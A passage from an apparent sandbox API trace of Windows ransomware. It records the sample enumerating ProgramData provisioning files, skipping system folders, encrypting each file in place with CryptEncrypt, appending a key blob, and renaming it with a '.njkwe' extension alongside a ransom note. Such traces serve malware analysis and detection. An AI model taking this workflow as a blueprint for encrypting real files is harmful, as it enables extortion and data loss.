pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0082.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\570__connections_cellular_telekom.ro (romania)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\570__Connections_Cellular_TELEKOM.RO (Romania)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\570__connections_cellular_telekom.ro (romania)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.168] GetProcessHeap () returned 0xbe0000 [0082.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.168] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9149c8b9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9149c8b9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9149c8b9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x37d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", cAlternateFileName="571__C~1.PRO")) returned 1 [0082.168] lstrcmpiW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.168] lstrcmpiW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.168] lstrcmpiW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.168] lstrcmpiW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.168] lstrcmpiW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.168] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml") returned 164 [0082.168] StrStrIW (lpFirst="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.169] lstrcmpW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.169] lstrcmpW (lpString1="571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.169] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\571__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.169] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\571__connections_cellular_telekom.ro (romania)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.169] GetTickCount () returned 0x1154d90 [0082.169] GetTickCount () returned 0x1154d90 [0082.169] GetTickCount () returned 0x1154d90 [0082.169] GetTickCount () returned 0x1154d90 [0082.169] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.169] GetProcessHeap () returned 0xbe0000 [0082.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.169] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x37d, lpOverlapped=0x0) returned 1 [0082.170] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffc83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.171] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x37d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x37d, lpOverlapped=0x0) returned 1 [0082.171] GetProcessHeap () returned 0xbe0000 [0082.171] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.171] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.171] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.171] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.171] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.171] CloseHandle (hObject=0x444) returned 1 [0082.171] GetProcessHeap () returned 0xbe0000 [0082.171] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.171] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0082.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\571__connections_cellular_telekom.ro (romania)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\571__Connections_Cellular_TELEKOM.RO (Romania)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\571__connections_cellular_telekom.ro (romania)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.172] GetProcessHeap () returned 0xbe0000 [0082.172] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.172] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9149c8b9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9149c8b9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9149c8b9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="572__C~1.PRO")) returned 1 [0082.172] lstrcmpiW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.172] lstrcmpiW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.172] lstrcmpiW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.172] lstrcmpiW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.172] lstrcmpiW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.172] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml") returned 156 [0082.172] StrStrIW (lpFirst="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.172] lstrcmpW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.172] lstrcmpW (lpString1="572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.172] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\572__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\572__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.173] GetTickCount () returned 0x1154d90 [0082.173] GetTickCount () returned 0x1154d90 [0082.173] GetTickCount () returned 0x1154d90 [0082.173] GetTickCount () returned 0x1154d90 [0082.173] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.173] GetProcessHeap () returned 0xbe0000 [0082.173] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.173] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0082.175] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.175] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0082.175] GetProcessHeap () returned 0xbe0000 [0082.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.175] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.175] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.175] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.175] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.175] CloseHandle (hObject=0x444) returned 1 [0082.175] GetProcessHeap () returned 0xbe0000 [0082.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.175] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\572__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\572__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\572__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.176] GetProcessHeap () returned 0xbe0000 [0082.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.176] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9149c8b9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9149c8b9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9149c8b9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="573__C~1.PRO")) returned 1 [0082.176] lstrcmpiW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0082.176] lstrcmpiW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0082.176] lstrcmpiW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0082.176] lstrcmpiW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0082.176] lstrcmpiW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0082.176] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0082.176] StrStrIW (lpFirst="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0082.176] lstrcmpW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.176] lstrcmpW (lpString1="573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0082.176] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\573__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.176] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\573__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.177] GetTickCount () returned 0x1154d9f [0082.177] GetTickCount () returned 0x1154d9f [0082.177] GetTickCount () returned 0x1154d9f [0082.177] GetTickCount () returned 0x1154d9f [0082.177] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.177] GetProcessHeap () returned 0xbe0000 [0082.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.177] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0082.199] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.199] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0082.199] GetProcessHeap () returned 0xbe0000 [0082.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.199] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.199] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.201] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.201] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.201] CloseHandle (hObject=0x444) returned 1 [0082.201] GetProcessHeap () returned 0xbe0000 [0082.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.201] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0082.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\573__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\573__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\573__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.202] GetProcessHeap () returned 0xbe0000 [0082.202] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.202] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914c2b28, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914c2b28, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914c2b28, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="574__C~1.PRO")) returned 1 [0082.205] lstrcmpiW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.205] lstrcmpiW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.205] lstrcmpiW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.205] lstrcmpiW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.205] lstrcmpiW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.205] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml") returned 156 [0082.205] StrStrIW (lpFirst="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.205] lstrcmpW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.205] lstrcmpW (lpString1="574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.205] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\574__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\574__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\574__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.206] GetTickCount () returned 0x1154dbf [0082.206] GetTickCount () returned 0x1154dbf [0082.206] GetTickCount () returned 0x1154dbf [0082.206] GetTickCount () returned 0x1154dbf [0082.206] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.207] GetProcessHeap () returned 0xbe0000 [0082.207] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.207] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0082.208] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.208] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0082.208] GetProcessHeap () returned 0xbe0000 [0082.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.208] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.208] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, 